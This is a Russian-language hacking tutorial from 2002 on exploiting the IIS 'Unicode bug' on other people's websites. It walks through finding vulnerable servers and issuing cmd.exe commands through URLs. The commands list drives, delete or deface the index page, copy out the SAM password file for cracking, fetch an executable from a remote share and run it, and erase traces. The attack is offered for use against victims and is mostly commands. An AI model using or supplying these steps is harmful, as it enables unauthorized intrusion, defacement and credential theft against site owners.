[ Исследование и взлом сайтов с использованием Unicode Bug'а. ]
Date: 24.08.02
Итак, в этой статье речь пойдет, пожалуй, о самом известном баге в веб-сайтах, о Unicode Bug'е,
потому как именно с его помощью множество юных хакеришек первый раз в своей жизни "марают руки".
Многие люди слышали об этой уязвимости, однако так и не научились ею пользоваться.
Хотя ничего сложного здесь не наблюдается, так как все основано на досовских командах, и
любой, кто пользовался когда-либо командной строкой MsDOS сможет освоить и эту уязвимость.
О ней, помнится, даже журнал "Хакер" писал когда-то. Kodsweb поможет вам исправить это недоразумение.
Уязвимыми являются Microsoft IIS 4.0/5.0 on Windows 2000, NT4, Windows98
Ищем уязвимый сайт
Берем Yandex.ru, в поле поиска вставляем "wwwroot", жмем
на пимпу поиска и получаем список серверов.
Теперь берем сканер типа IP-Tools и пингуем выборочно сервак, чтобы получить что-то подобное
running Microsoft-IIS/5.0 on Windows 2000
running Microsoft-IIS/4.0 on NT4/Windows 98
Используем уязвимость
Конструкций данной уязвимости существует достаточно много, вот лишь
некоторые из них:
Вводим это по очереди в браузер и смотрим, что он нам выдаст.
Если выдает ошибку (типа нет тут такого), вводим следующую конструкцию. Если все неподходят,
то сервак пропатчен, значит придется искать другой.
Можно взять CGI сканер, запихать туда все эти конструкции, запихать туда
список серверов и сканить по списку.
Итак, ошибка в браузере сменилясь на неожиданно появившийся листинг диска C:
Это то что нужно.
Теперь рассмотрим несколько конструкций, необходимых для перемещения по дискам.
Хочу сразу отметить, что дисков там может быть множество. Я встречал около 7 дисков, может больше,
использующий, соответственно разные буквы, к примеру С,D,N,M,X,Z, короче, их может быть до кучи.
Но не суть важно. Ты же не за 10 минут решил свалить оттуда.
Конструкции вида:
cmd.exe?/c+dir+c:\
cmd.exe?/c+dir+d:\
cmd.exe?/c+dir+n:\
cmd.exe?/c+dir+m:\
cmd.exe?/c+dir+x:\
cmd.exe?/c+dir+z:\
помогут тебе перемещаться по дискам.
Сначала надо полазить там, изучить структуру, и прочее.
После того, как ты узнал то, что тебе нужно, ты, наверное, захочешь сделать дефейс.
Делаем дефейс
Для этого необходимо найти папку InetPub/wwwroot, там лежит содержимое сайта: файло и все странички.
Допустим вы нашли эту папку на диске С:
Заходим в нее:
cmd.exe?/c+dir+c:\InetPub\wwwroot
Ищем главную страницу. Так, нашли. Она может иметь вид типа: index.html,index.htm, default.html,
default.htm, index.php - то есть комбинаций на самом деле не так много. Немного
практики и ты будешь находить эти страницы автоматически.
Чтобы просто удалить эту страницу, вводим:
cmd.exe?/c+del+c:\InetPub\wwwroot\index.html
Пытаемся ее изменить:
cmd.exe?/c+@echo+Hacked by Kodsweb>c:\InetPub\wwwroot\index.html
Ничего не получилось. Чтобы получилось, необходимо устранить проблему с символами ">" "<", необходимыми
для дефейса. Для этого необходимо скопировать cmd.exe в директорию, подверженную unicode'у,
например, в директорию msadc:
cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\progra~1\common~1\system\msadc\cmd1.exe
Заметьте, что имя файла изменилось на cmd1.exe, это важно.
Теперь делаем дефейс следующей конструкцией:
www.server.com\msadc\cmd1.exe?/c+@echo Hacked by KODSWEB>c:\InetPub\wwwroot\index.html
Но это дефейс плайн-текстом. Это очистит страницу и поместит на нее наш текст,
где теперь черным по белому будет написано "Hacked by KODSWEB".
Конструкция вида:
www.server.com\msadc\cmd1.exe?/c+@echo Hacked by KODSWEB>>c:\InetPub\wwwroot\index.html
добавит ваши слова вниз главной страницы (не многим это нравится). Текст будет
добавлен на уже имеющуюся страницу.
Чтобы вместе с плайн тектом изменить заголовок страницы, делаем так:
www.victim.com/msadc/cmd1.exe?/c+echo+"DO NOT close your Eyes on this BUG. Download p4tch for y0ur system.Hacked by {dr}{nerve} [kodsweb team] Zpeci4l GreeDzz to: VooDoo2029, Lamo, Monster, Drakula">c:\InetPub\wwwroot\index.html
Чтобы повесить картинку, необходимо сделать следующее:
www.victim.com/scripts/cmd1.exe?/c+echo+"">c:\InetPub\wwwroot\index.html
Полностью имеем сайт
Чтобы поиметь сайт полностью, необходимо стащить с него sam._ файл с паролями.
cmd.exe?/c+copy+c:\winnt\repair\sam._+c:\InetPub\wwwroot
Затем, скопированный файл забираем через WEB.
www.victim.com\sam._
Берем l0Pht Crack и декодируем sam._
Но это не для слабых машин. Чаще всего декодирование не приносит результатов
или отнимает несколько дней. Если удалось, то лезем на ftp, сервер полностью
в ваших руках.
Заливаем файло на сервер жертвы
I способ.
Берем шаровар-сканер и ищем расшареный ресурс. Нашли, подключили, положили туда файл,
который нужно залить на сервер.
Далее:
cmd.exe?/c+net+use+x:+\\62.118.*.*\c
Здесь 62.118.*.* - айпишник расшаренного ресурса, а "с" - имя этого ресурса.
Далее:
cmd.exe?/c+dir+x:\
выдаст список файлов машины с расшареным ресурсом.
Копируем файл наш файл с расшареного ресурса на уязвимый сервер:
cmd.exe?/c+copy+x:\ourfile.exe+c:\winnt\
Запускаем файл:
cmd.exe?/c+c:\winnt\ourfile.exe
Сервер долго будет думать, а потом выдаст ошибку, но
так и нужно, файл запущен.
Заметаем следы. Отключим все сетевые ресурсы:
cmd.exe?/c+net+use+*+/delete+/yes
II Способ
Мне известен также второй способ, но сам я его не пробовал, не приходилось.
Но пробовали другие, и так как работает, то я вам и его напишу.
Берем ftp сервер на Windows9x/NT, к которому есть доступ на запись
Заливаем на FTP сервер нужный файл, а на уязвимом сервере создается вот такой скрипт
путем последовательного введения команд.
На самом деле все вышеописанное только кажется простым. На самом деле придется действитель попотеть.
чтобы получило все, что хочется. В большинстве случаев будет закрыт доступ на копирование файлов
и, соответственно, на их удаление. Придется потыкаться, ничего тут не поделаешь. Но быстро - хорошо
не бывает, как говорит одна умная пословица. Придется также подъискать подходящую директорию,
подверженую юникоду, так как msadc не всегда срабатывает. Но можно потыкаться и копировать
cmd1.exe сразу в несколько директорий, и затем уже пробобать сокращать конструкцию.
Только не забудьте, куда вы все это копировали, чтобы задем замести следы, удали всю вашу работу,
если ничего не получится, чтобы вернуться позже. Старайтесь не удалять лишнего.
На следующий день баг могут прикрыть и вы не получите, чего хотели :-)
Кроме того найти серваки с таким багом будет сейчас уже не легко, так как их уже
давно перехакали юные хаксоры. Но тебе, я уверен, повезет.
Удачи тебе!
{dr}{NerVe} [KODSWEB]
!!! Статья является собственностью команды KODSWEB !!!
!!! Любое распространение без нашего разрешения строго запрешено !!!
